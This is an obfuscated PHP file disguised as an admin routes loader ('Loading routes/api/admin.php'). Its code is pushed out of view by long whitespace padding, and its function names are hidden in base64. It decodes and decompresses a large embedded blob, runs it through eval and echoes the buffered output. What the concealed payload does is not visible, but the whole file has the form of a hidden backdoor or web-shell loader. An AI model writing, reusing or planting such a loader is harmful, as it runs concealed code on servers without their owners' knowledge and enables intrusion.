<?php 
        $__='printf';$_='Loading routes/api/admin.php';
        



















































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWttu2zgQfQ+w/5CHAm7RRapLkq4R+MFSLFmyq9ZWrNtLIZKOJIu6bGXLlr9+h5LbVO02SLHbvRQ8RuKY5HBmzjlkgkDn5x2evQeMBuWHJN/eD27ajyeMBh+K3XZdvQrL5FVIsiS/KOPyXKVhVV1cXAxuzk57nP9yxl//3uuMiXb+N2L01cjAE4eV74pJoE9Gg3boQf0n4WSs0TkHBwfHz4kBzhyBeObO0B3Jd/eFqQ3vvSZ93V2acGt21/V7ThUHBwcHBwcHBwfH/w383xkcHBwcPy8GKKzW15fvyRoXZD244YxwcHBwcHD8JfSfNrhdFJaaO8fAVhQ8VbA9XQpYO9wi6UrA2bBCutNg8aAEulgielCItyy8iZYil+4WniOEE6tG+bJB0qEKPOP17aIUsbSKFp6y9yaxQGDPhTTckalZI/1AcW7hhbvchu4VXslO43vLj++9nG/3wox4FjUmtEJTh62Pie6wtXusDxuiHXTfteJAd46eZtZQF2Ux0E89i4TZvSps5/aP/YJefzMm2sK2FRvJjhB4b4DL/Q/PO19Af2PWo2IEnkkNnR6NKSnan6e0Jray8d3LCGdOHnoW1GVEC0cxjWnHE26UDMlGtHaHIk6UGHSvQuCS6LRGyWXk6DEFDVkvsMdQBN6Phq414JEKSVoauIvIz9OIwDrjxP1KchqS0U3gKA2SgxJ0aaCmEtaUCHIYOoFxZ8/qhFxFyx2rW9eOWKI5ypzUmC6LwB4nvqeURqKA5ssUvCD7bY9d/DxRNJSV9dpWEuLSKtDpLmiUK5hrOi0mrG5LTYq69TY9eWNT7pFsCTOVQA8EasKVoW07X6ca9Bj3/bcpN4jV1uwjUzrUgUR3piiU87urne+KFPaJu9jTXJMy73c+uCuuwaNHokY50oc5GzNhH1f45rm5fptZle9Zx7k6fojp8vV4YHnZGXyblTJR8TfqAc1gjp2HVavfCvYnlNUzl4MY6TSF80bn3rIOJWfHagtyZ+fLyxJJl9FMTaM1xBrqOALPUDJ1GtAQmdISPDLJjVvhpaGSFZK2FMZL8JPku4cyUIFTlRyJa20C6MVsxsN3iSLg3KHeXQW6PNZPx82XPAYy029cuA3Zg5+z0Is+5j8Sz4xJl7O35ykv1Mt0ja799r65zIH2ytADEWWWELrDnaFGpTGFuhLoU1UeckoO+ATXYe5swQOFJ2kNeHTfaihaIs40oXenbYprXzrEWH7DavmduGLlu1Hu2en2XXYVI3dVmFIpIvcQh5OPe7E+i4hx/JVG35cvhju1xCohM1t4iTJtG9hRDjwcQ2+cz+6+3R+W4po07Tm4a7l8xJPd2n6OU3zrs9Yr2qezlgfeojCb4R7upC2CdRCze2I//Zj+mTuG+lB+nDsxRtmyxFmaz1UF/envlt7Zfljf00u2CiTjR/kLoBaUHWrfXdRriab39tO4/CzuC490un8+z/gmEtzHGZunKePQFKv9/I6S2Yn7e7vlYzS4OTv75/+QGLXvz0+fXtx8T/hnsU8JfPaQ8PmAfR/8+iktfy7yv/FcZF+r5z1zdFK9uPkD/qAABQ==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


















































































































































































                                                                                                                                                                                                                     $________;
